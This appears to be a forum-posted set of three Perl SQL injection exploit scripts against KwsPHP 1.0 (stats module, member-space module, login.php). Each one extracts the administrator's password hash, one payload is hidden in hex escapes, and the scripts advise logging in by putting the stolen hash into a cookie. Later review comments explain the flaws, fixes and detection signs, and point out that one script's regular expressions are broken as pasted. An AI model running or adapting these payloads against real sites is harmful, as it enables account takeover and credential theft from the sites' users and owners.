# stats module:
####################################################
# Script..........................: KwsPHP ver 1.0 stats Module
# Script Site..................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: Remote SQL injection Exploit
# Access.........................: Remote
# level.............................: Dangerous
# Author..........................: S4mi
# Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
####################################################
# This Exploit Work Only When magic_quotes_gpc Is OFF
#
#Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
####################################################
#vuln code : \modules\stats\index.php line ~ 700 - 720
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# [code]
# elseif(isset($aff) && ($aff=="browser"))
# {
# if(isset($typenav))
# {
# bloc_head("Statistiques des navigateurs ".$liste_navigateurs[$typenav]);
#
# $tot_nav=0;
#
# $requete=reqmysql("SELECT SUM(hit) as tot FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `type` ASC ");
#
# while ($ligne = mysql_fetch_object($requete))
# {
# $tot_nav = $ligne->tot;
# }
# $requete=reqmysql("SELECT * FROM `stats` where type='nav' and valeur like '$typenav**%' ORDER BY `hit` DESC");
#
####################################################
#
# NOTE(review): the PHP quoted above is the whole story. The request
# parameter `typenav` is interpolated verbatim into two SQL strings
# ("... valeur like '$typenav**%' ..."), so a single quote in the
# parameter terminates the literal and the remainder is parsed as SQL.
# The author's stated precondition (magic_quotes_gpc off) is the only
# thing between the request and the query, and magic_quotes was never a
# real control. Application-side fix: bind `$typenav` as a query
# parameter, or — since it is only ever used as a key of
# `$liste_navigateurs` — reject any value that is not one of those keys
# before the query is built. Detection: a `typenav` value carrying a
# quote, `UNION` or `/**/` in the access log is never a legitimate
# request to this page.
#
#!/usr/bin/perl
use IO::Socket ;
# Style note: no `use strict`/`use warnings`, package globals throughout,
# and `&sub()` call syntax — left as written.
&header();
&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));
$host = $ARGV[0];
$path = $ARGV[1];
$user = $ARGV[2];
syswrite STDOUT ,"\n Connecting ...";
# Plain HTTP, port hard-coded to 80 (indirect-object `new` syntax).
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n Unable to connect to $host\n" unless($sock);
syswrite STDOUT, "[OK]";
# The payload closes the `like '...'` literal, appends a UNION that
# selects `pass` and `pseudo` from `users` for the requested pseudo, and
# comments out the trailing `**%' ORDER BY ...` with `/*`.
$inject = "9999'/**/UNION/**/SELECT/**/0,0,pass,pseudo/**/FROM/**/users/**/WHERE/**/pseudo='$user'/*";
syswrite STDOUT ,"\n Sending Data ...";
# Everything travels in the URL of a body-less POST (no Content-Length is
# sent), so the full payload is recorded in the web server access log.
print $sock "POST $path/index.php?mod=stats&aff=browser&typenav=$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";
while($answer = <$sock>){
# The selected column value is picked out of an image file name in the
# response — presumably the page renders each `valeur` row as
# nav_<valeur>.png; inferred from this pattern, not from shown PHP.
if ($answer =~ /nav_(.*?).png/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $user\n";
# The sample output in the header is a 32-hex-digit digest, which
# suggests `pass` is stored as an unsalted hash — confirm against the
# application's password handling. Salted, slow hashing would limit
# the damage of this disclosure.
print "+ Password: $1\n";
print "+ ----Have Fun---- +\n";
print "+ You don't need to crack the hash password \n";
# NOTE(review): this hint implies the application trusts the stored
# hash when presented in a cookie. If so, that is a second weakness
# (pass-the-hash through the session cookie) and server-side session
# state is the fix — not verified from this page.
print "+ Just login with ur owen information and edit the cookies\n";
}
}
# Print usage and exit.
sub usage{
 print "\nUsage : perl $0 host /path/ UserName ";
 print "\nExemple : perl $0 www.victim.com /KwsPHP/ admin\n";
 exit(0);
}
# Print the banner.
sub header(){
print q(~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script......................: KwsPHP ver 1.0 stats Module
# Script Site.................: http://kws.koogar.org/
# Vulnerability...............: Remote SQL injection Exploit
# Access......................: Remote
# level.......................: Dangerous
# Author......................: S4mi
# Contact.....................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~);
}

# member_space module:
#
# NOTE(review): second proof-of-concept, against the member-space
# ("espace_membre") module. It logs in with ordinary credentials first,
# so this injection point sits behind authentication, then requests the
# `carnet` edit action with a hex-escaped UNION SELECT in its `id`
# parameter. `$offset` is just the plain query string
# `espace_membre&ac=carnet&act=editer&id=` written as \x escapes, and
# `$evil0` has the same shape as the stats-module payload; the escaping
# hides the payload from a casual reader, not from the database. Same
# root cause, same fix: `id` must be bound or cast to an integer before
# it reaches SQL. Any non-numeric `id` on this action is a detection
# signal.
#
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Cookies;
$host = $ARGV[0];
$User = $ARGV[1];
$passwd = $ARGV[2];
# `$host` is expected to carry the path and a trailing slash (see usage
# below), since nothing is inserted between it and `index.php`.
$url = "http://".$host;
# Assigned but never used; the scheme and port are fixed by `$url`.
$port = "80";
print q(
#################################################################
# Script....................: KwsPHP v1.0 Member_Space Module #
# Script Site...............: [url]http://kws.koogar.org/[/url] #
# Vulnerability.............: Remote SQL injection Exploit #
# Access....................: Remote #
# level.....................: Dangerous #
# Author....................: S4mi #
# Contact...................: S4mi[at]LinuxMail.org #
# This Exploit Work Only When magic_quotes_gpc Is OFF #
################### (C)oded By S4mi ############################
);
 if (@ARGV < 3) {
 print " # usage : xpl.pl host/path/ User Passwd\n";
 print " # e.g : xpl.pl 127.0.0.1/KwsPHP/ zaz luks\n";
 exit();
 }
 print " [~] User/Password : $User/$passwd \n";
 print " [~] Host : $url \n";
 $xpl = LWP::UserAgent->new() or die;
 $cookie_jar = HTTP::Cookies->new();
 print " [~] Logining ...\n";
 # The cookie jar keeps the session from the login POST for the GET below.
 $xpl->cookie_jar( $cookie_jar );
 # Login result is never checked; a failed login only shows up as the
 # "Exploit Failed" branch further down.
 $login = $xpl->post($url.'index.php', Content => [ "pseudo" => "$User", "pass" => "$passwd", "submit" => "Se connecter", ],);
# Hex-escaped UNION SELECT that labels the two selected columns with
# "username:" / "password:" prefixes (built with char()) so they can be
# found in the response below.
$evil0 = "\x39\x39\x39\x39\x39\x27\x2F\x2A\x2A\x2F\x55\x4E\x49\x4F\x4E" .
"\x2F\x2A\x2A\x2F\x53\x45\x4C\x45\x43\x54\x2F\x2A\x2A\x2F\x6E" .
"\x75\x6C\x6C\x2C\x63\x6F\x6E\x63\x61\x74\x28\x63\x68\x61\x72" .
"\x28\x31\x31\x37\x2C\x31\x31\x35\x2C\x31\x30\x31\x2C\x31\x31" .
"\x34\x2C\x31\x31\x30\x2C\x39\x37\x2C\x31\x30\x39\x2C\x31\x30" .
"\x31\x2C\x35\x38\x29\x2C\x70\x73\x65\x75\x64\x6F\x2C\x63\x68" .
"\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x63\x6F\x6E\x63\x61\x74" .
"\x28\x63\x68\x61\x72\x28\x31\x31\x32\x2C\x39\x37\x2C\x31\x31" .
"\x35\x2C\x31\x31\x35\x2C\x31\x31\x39\x2C\x31\x31\x31\x2C\x31" .
"\x31\x34\x2C\x31\x30\x30\x2C\x35\x38\x29\x2C\x70\x61\x73\x73" .
"\x2C\x63\x68\x61\x72\x28\x31\x32\x37\x29\x29\x2C\x6E\x75\x6C" .
"\x6C\x2F\x2A\x2A\x2F\x46\x52\x4F\x4D\x2F\x2A\x2A\x2F\x75\x73" .
"\x65\x72\x73\x2F\x2A\x2A\x2F\x57\x48\x45\x52\x45\x2F\x2A\x2A" .
"\x2F\x69\x64\x3D\x31\x2F\x2A";
# Hex-escaped "espace_membre&ac=carnet&act=editer&id=".
$offset = "\x65\x73\x70\x61\x63\x65\x5F\x6D\x65\x6D\x62\x72\x65\x26\x61" .
"\x63\x3D\x63\x61\x72\x6E\x65\x74\x26\x61\x63\x74\x3D\x65\x64" .
"\x69\x74\x65\x72\x26\x69\x64\x3D";
$target = $xpl->get($url."index.php?mod=$offset$evil0");
# The labelled values are expected back inside form field `value="..."`
# attributes of the edit page.
# NOTE(review): the capture group in this pattern (and the next one) is
# never closed — as pasted, Perl would refuse to compile it; most likely
# a `)` lost in the forum rendering.
if($target->as_string =~ /value="username:(.*?"/) {
$zaz = $1;
print " [+] Exploit succeed! Getting admin information. \n";
print " [+] ------------------------------------------- \n";
}
if($target->as_string =~ /value="password:(.*?"/) {
$luks = $1;
# `$zaz` is only set if the first pattern matched; otherwise this
# prints an empty user name.
print " [+] UserName : $zaz \n";
print " [+] Password : $luks \n";
}
else {
print " [-] Exploit Failed ! \n";
}
print "\n#############################################################\n";

# login.php:
####################################################
# Script..........................: KwsPHP ver 1.0
# Script Site..................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: login.php Remote SQL injection Exploit
# Access.........................: Remote
# level.............................: Dangerous
# Author..........................: S4mi
# Contact.........................: S4mi[at]LinuxMail.org
####################################################
#Special Greetz to : Simo64, DrackaNz, Coder212, Iss4m, HarDose, E.chark, r0_0t, ddx39
####################################################
# This Exploit work Only When magic_quotes_gpc Is OFF
#
#Usage : C:\Xploit.pl 127.0.0.1 /KswPHP/ admin
#Result Screen Shot :
#+**********************+
# Connecting ...[OK]
# Sending Data ...[OK]
#
# + Exploit succeed! Getting admin information.
# + ---------------- +
# + Username: admin
# + Password: e10adc3949ba59abbe56e057f20f883e
####################################################
#
# NOTE(review): third proof-of-concept, against login.php itself. The
# `pseudo` value is sent with a leading %22 (a double quote) and a wide
# UNION, which suggests the login query wraps `pseudo` in double quotes
# and selects that many columns — inferred from the payload, the PHP is
# not shown here. The login fields are passed in the query string of a
# body-less POST and the page evidently honours them there, so the full
# payload ends up in the access log. Same fix as above: bind `pseudo`
# and `pass` as parameters; the login query is the one place where an
# unauthenticated request reaches SQL, so it should be the first one
# audited.
#
#!/usr/bin/perl
use IO::Socket ;
&header();
&usage unless(defined($ARGV[0] && $ARGV[1] && $ARGV[2]));
$host = $ARGV[0];
$path = $ARGV[1];
$user = $ARGV[2];
syswrite STDOUT ,"\n Connecting ...";
# Plain HTTP, port hard-coded to 80.
my $sock = new IO::Socket::INET ( PeerAddr => "$host",PeerPort => "80",Proto => "tcp",);
die "\n Unable to connect to $host\n" unless($sock);
syswrite STDOUT, "[OK]";
# URL-encoded UNION that puts `pass` into the second selected column;
# the trailing `&pass=...&verifer=...` fields are what the login form
# normally submits.
$inject = "union%20all%20select%200,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users%20where%20pseudo='$user'/*&pass=ZAZ&verifer=Se%20Loguer";
syswrite STDOUT ,"\n Sending Data ...";
print $sock "POST $path/login.php?pseudo=%22$inject HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Connection: Close\n\n";
syswrite STDOUT ,"[OK]\n\n";
while($answer = <$sock>){
# The selected value is expected to be echoed inside the login status
# message element — presumably the page prints the pseudo it looked up;
# inferred from this pattern.
if ($answer =~ /class="messagelogin">(.*?) /){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ----------------------- +\n";
print "+ Username: $user\n";
print "+ Password: $1\n";
print "+ -------Have Fun--------- +\n";
print "+ You don't need to crack the hash password \n";
print "+ Just login with ur owen information and edit the cookies\n";
}
}
# Print usage and exit.
sub usage{
 print "\nUsage : perl $0 host /path/ UserName ";
 print "\nExemple : perl $0 [url]www.victim.com[/url] /KwsPHP/ admin\n";
 exit(0);
}
# Print the banner.
sub header(){
print q(~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script......................: KwsPHP ver 1.0
# Script Site.................: [url]http://kws.koogar.org/[/url]
# Vulnerability...............: Remote SQL injection Exploit
# Access......................: Remote
# level.......................: Dangerous
# Author......................: S4mi
# Contact.....................: S4mi[at]LinuxMail.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~);
}